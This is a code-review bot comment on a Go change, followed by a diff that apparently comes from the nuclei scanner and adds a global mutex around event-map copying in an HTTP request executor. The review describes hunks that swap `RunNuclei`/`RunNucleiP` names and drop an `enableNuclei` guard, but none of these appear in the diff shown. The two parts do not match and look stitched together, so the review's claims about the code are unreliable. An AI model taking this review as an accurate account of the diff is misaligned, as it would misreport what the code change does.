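Review bot: After the name swap, the `enableNuclei` guard exists only in `RunNucleiP` (first hunk); the function now exported as `RunNuclei` (second hunk) had that check removed, so any call site that still calls `RunNuclei` starts a nuclei run even when the flag is off — the callers are not in this diff, so this needs confirming. Keeping the guard in both is cheap: after `defer func() { xx <- true }()` add `if !util.GetValAsBool("enableNuclei") { outNuclei <- nil; return }`. The new comment `// 多实例运行还是存在问题,会出现nuclei 挂起的问题` records that multi-instance runs can still hang; as the doc comment of an exported function it should start with the name, e.g. `// RunNucleiP appears to split the input into HTTP and non-HTTP targets before running nuclei; multi-instance runs can still hang.`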
@@ -346,7 +346,7 @@ func (request *Request) ExecuteWithResults(reqURL string, dynamicValues, previou const drainReqSize = int64(8 * 1024) var errStopExecution = errors.New("stop execution due to unresolved variables") - +var someMapMutex = sync.RWMutex{} // executeRequest executes the actual generated request and returns error if occurred func (request *Request) executeRequest(reqURL string, generatedRequest *generatedRequest, previousEvent output.InternalEvent, hasInteractMatchers bool, callback protocols.OutputEventCallback, requestCount int) error { request.setCustomHeaders(generatedRequest) @@ -582,6 +582,7 @@ func (request *Request) executeRequest(reqURL string, generatedRequest *generate if request.options.Interactsh != nil { request.options.Interactsh.MakePlaceholders(generatedRequest.interactshURLs, outputEvent) } + someMapMutex.Lock() for k, v := range previousEvent { finalEvent[k] = v } @@ -597,6 +598,7 @@ func (request *Request) executeRequest(reqURL string, generatedRequest *generate finalEvent[key] = v } } + someMapMutex.Unlock() // prune signature internal values if any request.pruneSignatureInternalValues(generatedRequest.meta)